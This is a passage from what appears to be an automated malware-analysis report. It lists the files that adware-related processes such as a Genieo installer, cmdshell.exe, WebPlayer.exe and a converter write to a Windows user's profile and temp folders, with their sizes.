C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\noItems.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_awaitingMessage.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\off.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo_old\img (24 bytes)

The process cmdshell.exe:3084 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Windows\SysWOW64\3280701.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\rebirth[1].htm (1 bytes)

The process genieo_setup.exe:1552 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.gif (840 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\js\partnerConfig.js (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\2_collecting.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\1_downloading.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\js\partnerConfig.js (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-disabled.png (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\collapse.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\genuninstallui.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\genuninstallui.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_awaitingMessage.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partner.properties (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-24.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\install_icon.ico (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\complete.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\notification_rgn_image.bmp (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env_err.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\GenericApp.icns (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\icon-16-enabled.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\desktop.ico (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\partner.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\tray_normal.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disabled_18px.png (914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\cmd_close.png (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\genieo-16icon-browser-disabled.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\2_collecting.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\redHome.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-disabled.png (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\down3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\en_text.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\bin\license.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\network_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notfication_seperator.png (281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\expand.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\css\partner.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\uac_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.gif (847 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\firefox-bar-16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-enabled_18px.png (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\down2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disabled_18px.png (914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BD.tmp (25714 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\3_mapping.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\favicon.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\GenericApp.icns (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\install_icon.ico (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\favicon.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\complete.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-2.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\conf\partnerBannedList.dat (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partnerBannedList.dat (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BE.tmp\fct.dll (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\off.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser-disabled.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\error.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\conf\partner.properties (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_normal.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\fr_text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_rgn_image.bmp (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\css\notify_partner.css (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sethpButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\prep_env.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\uac_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\ru_complete.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\error.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\prep_env_err.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\text\text.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\ru_text.properties (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\1_downloading.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\network_retry.png (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\text\en_text.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB2BE.tmp\KillProcDLL.dll (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\desktop.ico (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-3.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\fr_complete.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\icon-16-enabled.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\partner_uninstall.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\sensor-disable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-disable.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\firefox-bar-24.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\hide_notification.png (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\disable-transition-4.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\3_mapping.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\4_creating.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\tray\4_creating.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\objectivehot_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\notification_disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\footer_right_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\genieo-16icon-browser.png (537 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\sensor-enabled_18px.png (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\genieo\img\noItems.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\tray_awaitingMessage.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\disable-transition-1.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\img\tray\off.ico (1 bytes)

The process WebPlayer.exe:2984 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\down[1] (748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\http_403_webOC[1] (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\ErrorPageTemplate[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\httpErrorPagesScripts[1] (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\errorPageStrings[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\config[1].json (778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\info_48[1] (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\bullet[1] (447 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\background_gradient[1] (453 bytes)

The process STab_Down_6.0.6.6.exe:3216 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\XTab_v4.0.exe (152612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\XTab_4.0.2.1716[1].exe (263908 bytes)

The process App Lid-codedownloader.exe:3264 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\manifest[1].xml (25 bytes)

The process converter.exe:4068 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gsdll32.dll (648640 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_ops.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewpcx.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019064l.pfb (18530 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m.xbm (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059016l.pfb (28130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\showpage.ps (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059036l.pfb (27394 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dbt_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\Setup.exe (29868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mgl_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ppath.ps (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdfwrite.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pcharstr.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\addxchar.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_kanji.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cmap.ps (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018015l.pfb (23234 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018012l.pfb (26066 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t.xbm (353 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lev2.ps (6242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf2dsc.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pv.sh (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l2img.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pfbtopfa.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022003l.pfb (22930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_sym_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019003l.pfb (15714 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\impath.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\wrfont.ps (2642 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s_m.xbm (615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_rbld.ps (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_main.ps (8594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidcm.ps (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\winmaps.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t.xpm (633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022023l.pfb (23586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021003l.pfb (26706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010015l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_base.ps (4226 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\uninfo.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wan_e.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_trap.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052004l.pfb (32818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m_m.xbm (971 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019024l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\acctest.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_type1.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010013l.pfb (16346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pfile.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\jispaper.ps (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s.xpm (993 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t_m.xbm (363 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\packfile.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_img.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devcs.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\rollconv.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_draw.ps (11330 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\landscap.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewps2a.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_typ42.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_resmp.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_sepr.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl5_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\cid2code.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052003l.pfb (32818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gslp.ps (2642 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\lines.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidfn.ps (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052023l.pfb (31554 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pf2afm.ps (1442 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_typ32.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\align.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019023l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_resst.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_frsd.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cff.ps (3650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_agl.ps (5522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.GS (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\zeroline.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewgif.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl2_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_font.ps (11338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ccfnt.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\type1ops.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stocht.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewpbm.ps (242 bytes)
